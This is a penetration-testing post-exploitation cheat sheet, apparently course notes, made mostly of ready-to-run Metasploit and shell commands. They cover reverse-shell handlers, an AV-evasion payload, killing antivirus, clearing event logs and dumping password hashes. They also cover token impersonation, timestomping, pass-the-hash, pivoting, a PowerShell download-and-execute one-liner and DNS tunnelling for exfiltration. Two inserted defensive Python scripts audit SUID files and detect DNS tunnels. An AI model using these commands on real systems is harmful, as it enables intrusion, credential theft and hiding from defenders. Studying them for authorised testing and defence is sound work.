Practical Security Assessment (Penetration Testing) - Post-Exploitation
Setting up a Listening Server for Reverse Connections
In Metasploit:
use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set ExitOnSession false
set LHOST ...
set LPORT ...
exploit -j
Creating Your Own Payloads
There are nice cheatsheets for msfvenom out there that help you create your own executables. When the user launches those executables, they will connect back to your machine -- providing a "reverse shell". For example, msfvenom cheatsheet.
But there are many more sophisticated ways to generate a payload that bypasses AV. For example, Metasploit 5 contains evasion modules, as you can see here:
use evasion/windows/windows_defender_exe
set payload windows/meterpreter/reverse_tcp
set lhost our_real_IP
run
handler -p windows/meterpreter/reverse_tcp -H 0.0.0.0 -P 8443 # to start the listener
After creating the executable, you deliver it to the user one way or another and then make the user run it.
Migration to Another Service for a Stable Connection
Type the following to migrate into the explorer.exe process: run migrate -n explorer.exe
Switch to Windows Shell
Type: shell
Enumerate Windows Users
Type: net user
See Which Users are Admins
Type: net localgroup Administrators
List Sessions
Type: sessions -l
Interact with a particular session
Type: sessions -i 1
When you get a shell on a Windows box
sysinfo # take a look at the system's information
getuid # check who we are currently
use priv # load priv extensions for getsystem and some other options
getsystem # try to escalate privileges to SYSTEM
run killav # try to kill antivirus
clearev # clear the logs
run post/windows/gather/checkvm # check if we are in a VM or not
run post/windows/gather/hashdump # dump hashes of user passwords
run winenum # generic report when you compromised the machine
run getcountermeasure # check what defensive measures (AV, firewall, etc.) are in place
run post/windows/gather/enum_applications
run post/windows/gather/enum_logged_on_users
run post/windows/gather/enum_shares
run post/windows/gather/enum_snmp
reg enumkey -k HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run # check out what runs when the machine boots up
Impersonation of a User
Run getsystem before impersonating anybody. (Just for the record, mitigation: set the account to not be delegated when creating it in AD to avoid this kind of impersonation.)
use incognito # allows to interact with a token in the memory
list_tokens -u # Microsoft stores a token in memory to log in users faster
list_tokens -g # list groups
impersonate_token DOMAIN\Administrator
Drop back to a regular user
rev2self
Gather data on the compromised machine
rtfm.py is a wonderful tool to remember all kinds of commands to gather data on the machine: users, network information, process list, system host info, file search, file shares, etc.
Prove Access
upload /home/Vitaly/Vitaly.txt c:\
timestomp C:\Vitaly.txt -v
timestomp C:\Vitaly.txt -m "07/07/1892 07:07:07"
timestomp C:\Vitaly.txt -v
Enumerate the Network inside of Meterpreter's Session
run netenum
run netenum -ps -r 10.10.30.0/24
run post/windows/gather/arp_scanner RHOSTS=10.10.30.0/24
State of the art pivoting (2019)
Pivoting via Meterpreter's Session
- Setting a route through the compromised host in Metasploit (outside of Meterpreter)
- Turning the compromised machine into a router
Now we can run a port scan through the compromised machine in Metasploit (outside of Meterpreter):
route print
route add COMPROMISED_IP 255.255.0.0 SESSION_ID
use auxiliary/scanner/portscan/tcp
set RHOSTS IP
set THREADS 10
run
Pivoting via SOCKS proxy in Metasploit
Read here about the proxy tunnels through Metasploit. Also, check out Exploring hidden networks with double pivoting. You create a proxy server in Metasploit that listens for connections. Then you link proxychains with that proxy server. After that, you can run any command through proxychains in the terminal. Here are the steps:
- Get a meterpreter shell through a vulnerable service or by any other means
- Now we need to route the traffic, and there are two ways we will take a look at. The shorter version is at the end of this list; here is the longer version:
- Use the post/multi/manage/autoroute module in Metasploit (outside of Meterpreter) to route traffic through the session ID of the compromised machine
- In the autoroute module, set SESSION (if there is only one Meterpreter session, it should be 1), SUBNET (the network that you cannot see but the compromised system can, e.g., 192.168.30.0), and NETMASK (e.g., 255.255.0.0) to the appropriate values, then run the module
- After the module completes, use the auxiliary/server/socks4a module to create a proxy server in Metasploit
- Set SRVHOST (Kali's IP address) and SRVPORT (9988 or anything else you want), then run the module
- After the socks4a server has started, open a terminal and edit /etc/proxychains.conf by adding the line socks4 127.0.0.1 9988 at the end of the file, where 9988 is the SRVPORT you set in step 6
- Now you can run any command in the terminal through the Meterpreter session by putting the word proxychains in front of it, e.g., proxychains nmap -A 192.168.30.0/24
There is an alternative way to autoroute if you have a meterpreter shell open. Type run autoroute -s 192.168.30.0/24 to route the traffic to 192.168.30.0/24 through the current meterpreter's session on the compromised machine. If you want to run traffic for a broader network, decrease the CIDR number like run autoroute -s 192.168.0.0/16.
psexec
Pass The Hash is a technique that, given a known hash of a known user, lets you pass those credentials to another machine without even cracking the hash itself.
use exploit/windows/smb/psexec
set SMBUSER Administrator
set SMBPASS jshkjfhaturtiuye3bj873thrdsyt34nsjfkgksh
set payload windows/x64/meterpreter/reverse_tcp
set RHOST ...
set LHOST ...
set LPORT ...
exploit
Port Forwarding in Metasploit
Port forwarding lets you forward a port from your local machine to the compromised machine. For example, if you want to use the remote desktop client rdesktop, you can forward port 3389. First, enter the Meterpreter session, then run the portfwd command, after which you can connect to the compromised machine by running rdesktop 127.0.0.1:3389. Another example, which uses the psexec exploit via SMB shares on a Windows box through a forwarded port, is shown below.
portfwd add -l 445 -p 445 -r remote_host_ip
background
use exploit/windows/smb/psexec
setg SMBUser known_user
setg SMBPASS known_password
set RHOST 127.0.0.1 # the exploit has to fire back to us though, so it goes to the localhost
set LHOST our_real_IP # this is not 127.0.0.1, but rather the external IP
set LPORT 5555 # that is the port our exploit will be listening on
run
Escalate Privileges on Windows
There is a very popular technique to escalate privileges that targets misconfigured services running as a privileged local account (like a Java updater). So you can use a tool like PowerUp, which not only targets and exploits those misconfigured services but also tries many other techniques to escalate privileges. To run it on the compromised machine, you can use the following PowerShell command to download PowerUp.ps1 from PowerUp and then run Invoke-AllChecks to identify possible ways of escalating privileges:
powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc/PowerUp.ps1'); Invoke-AllChecks
Additionally, privilege escalation modules are available in Metasploit, as you can see here.
Also, GTFOBins lets you find binaries that can be abused by an attacker to bypass local security restrictions.
Escalate Privileges on Linux
Similarly to Windows, there are techniques that allow you to escalate privileges on Linux. Most commonly, you look for world-writable files, SUID/SGID files owned by root, and misconfigurations. Some tools to do that:
- Unix-privesc-check (learn how to use it from pentestmonkey)
- LinEnum
- List of Linux/Unix known privilege escalation exploits which has not been updated since 2014 but is still worth looking at
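The findings those tools look for first, from the administrator's side, as an added example (not from the page or from any of the tools listed above): a Python audit that walks a directory tree and reports SUID/SGID binaries and world-writable regular files so they can be fixed before anyone abuses them. build_demo_tree and run_demo are constructed fixtures for this demo; point audit_tree at / (as root) to audit a real host.

```python
import os
import stat
import tempfile

def audit_tree(root):
    """Walk `root` and return (suid_sgid, world_writable): sorted lists of
    regular files with the setuid/setgid bit and of files anyone can write."""
    suid_sgid, world_writable = [], []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue  # unreadable or vanished; keep going
            if not stat.S_ISREG(st.st_mode):
                continue  # skip symlinks and special files
            if st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                suid_sgid.append(path)
            if st.st_mode & stat.S_IWOTH:
                world_writable.append(path)
    return sorted(suid_sgid), sorted(world_writable)

def build_demo_tree(base):
    """Constructed fixture: a setuid script, a world-writable file, a clean file.
    Returns the (suid_sgid, world_writable) lists the audit should report."""
    os.makedirs(os.path.join(base, "bin"))
    os.makedirs(os.path.join(base, "tmp"))
    suid = os.path.join(base, "bin", "helper")
    ww = os.path.join(base, "tmp", "notes.txt")
    clean = os.path.join(base, "bin", "ok")
    for p, mode in ((suid, 0o4755), (ww, 0o666), (clean, 0o755)):
        with open(p, "w") as fh:
            fh.write("#!/bin/sh\n")
        os.chmod(p, mode)  # explicit mode, so the umask does not interfere
    return [suid], [ww]

def run_demo():
    """Build the fixture in a temp dir, audit it, return (found, expected)."""
    with tempfile.TemporaryDirectory() as d:
        expected = build_demo_tree(d)
        return audit_tree(d), expected

if __name__ == "__main__":
    found, expected = run_demo()
    print("SUID/SGID:", found[0])
    print("world-writable:", found[1])
    print("matches fixture:", found == expected)
```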
SSH Tunnel
ssh -L 3389:localhost:3389 username@compromised_host_IP
Open a new terminal window and type: rdesktop 127.0.0.1
Discover the Hosts inside of Metasploit using db_nmap
db_nmap -sn -n -v --exclude our_IP remote_IP_range
-F # top 100 ports
-sS # SYN scan
-sC # run default nse scripts according to -sV
-oX # output with XML format
--reason
--open # show results if ports are open
db_nmap -p- -sS -n -v --reason --open -oX demo-ports.xml --stylesheet=nmap.xml IP # -p- scans all ports from 1 to 65535
db_nmap -sU -n -v --open --reason IP
db_import demo-ports.xml
Service Version Scan inside of Metasploit using db_nmap
db_nmap -sS -sV -sC -v -n -p 21,22,80,1617,4848,5985,8022,8080,8282,8484,8585,9200,49153 IP
Command and Control (C2) channel over DNS protocol
dnscat2 is a tool designed to create an encrypted C2 channel over DNS, which can be used as one of the most effective tunnels to send and receive data from compromised networks. This is a perfect way to evade firewalls and IDS/IPS and to exfiltrate data over DNS, which is typically allowed out. You may need to pay for a domain with an authoritative DNS server, e.g., on Namecheap or GoDaddy.
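The defender's counterpart to the above, as an added example that is not part of the original page or of dnscat2: a Python heuristic that scans a DNS query log for the footprint a dnscat2-style tunnel leaves (many distinct, long, high-entropy leftmost labels under one domain, mostly TXT/CNAME/MX lookups). The log lines, the attacker-c2.test domain and the thresholds are constructed assumptions for the demo; the last-two-labels domain split should be replaced by a Public Suffix List lookup on real data.

```python
import math
from collections import defaultdict

# Constructed sample query log, one "<client> <qname> <qtype>" per line.
SAMPLE_LOG = """\
10.10.30.15 www.example.com A
10.10.30.15 mail.example.com MX
10.10.30.40 cdn.example.com A
10.10.30.22 3b7e1a9f0c2d4e6a8b1c3d5e7f90a1b2c3d4e5f6.attacker-c2.test TXT
10.10.30.22 9a0c2e4f6b8d1a3c5e7f9b0d2f4a6c8e0b1d3f5a.attacker-c2.test TXT
10.10.30.22 c4d6e8fa0b2d4f6a8c0e2a4c6e8fa0b2d4f6a8c0.attacker-c2.test CNAME
10.10.30.22 e1f3a5b7c9d0e2f4a6b8c0d2e4f6a8b0c2d4e6f8.attacker-c2.test TXT
10.10.30.22 1a2b3c4d5e6f708192a3b4c5d6e7f8091a2b3c4d.attacker-c2.test MX
10.10.30.22 f0e1d2c3b4a5968778695a4b3c2d1e0f1a2b3c4d.attacker-c2.test TXT
"""
BULK_TYPES = {"TXT", "CNAME", "MX"}  # record types dnscat2 uses by default

def shannon_entropy(s):
    """Bits per character; a 40-char hex label lands around 3.4-3.9."""
    n = len(s)
    return -sum(s.count(c) / n * math.log2(s.count(c) / n) for c in set(s))

def registered_domain(qname):
    """Naive eTLD+1 (last two labels); use the Public Suffix List for real data."""
    return ".".join(qname.rstrip(".").split(".")[-2:])

def find_tunnel_candidates(log_text, min_queries=5, min_label=30,
                           min_entropy=3.0, min_share=0.8):
    """Sorted registered domains whose queries look like a DNS tunnel: nearly
    every query has a distinct long, high-entropy label and a bulk record type."""
    stats = defaultdict(lambda: {"labels": set(), "bulk": 0, "total": 0})
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 3:
            continue  # malformed line; ignore
        _client, qname, qtype = parts
        s = stats[registered_domain(qname)]
        s["total"] += 1
        s["labels"].add(qname.split(".")[0])
        s["bulk"] += int(qtype in BULK_TYPES)
    flagged = []
    for domain, s in stats.items():
        if s["total"] < min_queries:
            continue  # too little data to judge
        odd = sum(1 for l in s["labels"]
                  if len(l) >= min_label and shannon_entropy(l) >= min_entropy)
        if odd / s["total"] >= min_share and s["bulk"] / s["total"] >= min_share:
            flagged.append(domain)
    return sorted(flagged)
```

A real deployment would feed this from the resolver's query log or passive DNS over a sliding window and whitelist known CDNs and anti-spam services, which also produce long labels.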
Post-Exploitation Command Lists from Rob Fuller (Mubix)
- Metasploit Post-Exploitation
- Linux/Unix/BSD Post-Exploitation
- Windows Post-Exploitation
- OSX Post-Exploitation
- Obscure Systems (AIX, Embedded, etc.) Post-Exploitation